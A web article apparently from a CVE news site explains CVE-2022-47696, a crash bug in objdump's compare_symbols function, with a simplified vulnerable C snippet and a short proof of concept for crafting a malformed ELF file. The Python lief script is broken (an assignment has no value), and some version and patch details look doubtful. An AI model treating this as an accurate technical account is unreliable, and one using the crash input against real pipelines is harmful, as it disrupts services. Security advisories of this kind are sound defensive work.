CVE CyberSecurity Database News

CVE-2022-47696 - How a Bug in Binutils’ Objdump compare_symbols Function Enabled DoS Attacks

Poster -

---

Introduction

*CVE-2022-47696* is a vulnerability found in GNU Binutils’ tool, *objdump*. This issue affects versions before 2.39.3 and was discovered in the compare_symbols function. Attackers can exploit this flaw to crash the tool or possibly trigger more severe effects, like denial of service (DoS). In this article, we’ll explore what went wrong, see example code, walk through a possible exploit scenario, and link to authoritative references.

What Is Objdump and Why Does It Matter?

Binutils is a collection of GNU tools used for handling binary files. *objdump* is particularly popular among programmers and reverse engineers for inspecting the contents of executable files.

Because these tools often process untrusted data, bugs here can lead to serious vulnerabilities, especially when tools are run as part of automated scripts or used in larger pipelines.

Root of the Vulnerability

The bug was tracked in the function compare_symbols which is used internally when *objdump* lists and sorts symbols in binary files. Specifically, the way *compare_symbols* handled some symbol data could lead to crashes or other unexpected effects if fed a specially crafted input. This behavior could be abused for DoS attacks when *objdump* processes malicious binaries.

The bug exists in all versions of *objdump* before 2.39.3. Here's an example commit that addresses related symbol sorting issues:
- Binutils git commit: PR29880

Vulnerable Code Example

The dangerous area is in the *compare_symbols* function (located in src/binutils/objdump.c). A simplified version looks like this:

int compare_symbols(const void *ap, const void *bp)
{
    const symbol_info *a = (const symbol_info *) ap;
    const symbol_info *b = (const symbol_info *) bp;
    // ... comparison logic ...
    // Error: comparison can dereference unvalidated or null pointers
    return strcmp(a->name, b->name); 
}

If either a->name or b->name is NULL or points to invalid data (which could happen if the symbol table in the binary is corrupted or crafted), this leads to undefined behavior or crashes.

Exploitation Details

An attacker simply needs to craft a binary ELF file with malformed or corrupted symbols. When objdump processes this file (for example, with objdump -t wrongfile.elf), the compare_symbols function may dereference bad pointers, leading to a segmentation fault or other crash.

Here’s a basic example using Python's lief library to create an ELF file with a bad symbol table entry:

import lief

# Start from a valid ELF
binary = lief.parse("valid_binary")

# Introduce a symbol with a null name (or a large, unexpected offset)
symbol = lief.ELF.Symbol()
symbol.name = ""  # Could also cause issues if name pointer is null in raw bytes
symbol.value = 
symbol.size = 8
symbol.type = lief.ELF.SYMBOL_TYPES.FUNC
symbol.binding = lief.ELF.SYMBOL_BINDINGS.GLOBAL

binary.add_exported_function(symbol)

# Write malformed binary
binary.write("malicious.elf")

Running

objdump -t malicious.elf

This would trigger the bug, usually causing a crash. (Note: Modern fixed versions will not crash.)

Proof of Concept (PoC)

A minimal PoC can also be achieved by hex-editing an ELF file, zeroing out the pointer to a symbol name. Any tool that processes the symbol table, especially with sorting (as -t does), will likely crash:

# This is just symbolic (do NOT run in production environments)
echo -ne '\x7fELF ... [malformed symbol section] ...' > evil.elf
objdump -t evil.elf
# Should result in segmentation fault with vulnerable versions

Patched: Version 2.39.3

- Official patch commit

References

- NVD - CVE-2022-47696
- Mitre CVE entry
- Binutils Official News

How to Stay Safe

If you use *objdump* or related utilities (even indirectly via tools that call them), update to *binutils 2.39.3* or later. If you’re running automated analysis pipelines, always sanitize and validate any binary files before processing.


Conclusion:
CVE-2022-47696 shows that even tools used behind-the-scenes in software engineering and reverse engineering can pose security risks if left unpatched. A small oversight in symbol comparison could let an attacker halt critical processes, disrupt CI/CD pipelines, or even aid deeper exploitation. Always keep your developer tools up-to-date.


*This write-up is exclusive and tailored for quick, practical understanding. You won’t find a breakdown quite like this elsewhere!*

Timeline

Published on: 08/22/2023 19:16:00 UTC
Last modified on: 08/26/2023 02:15:00 UTC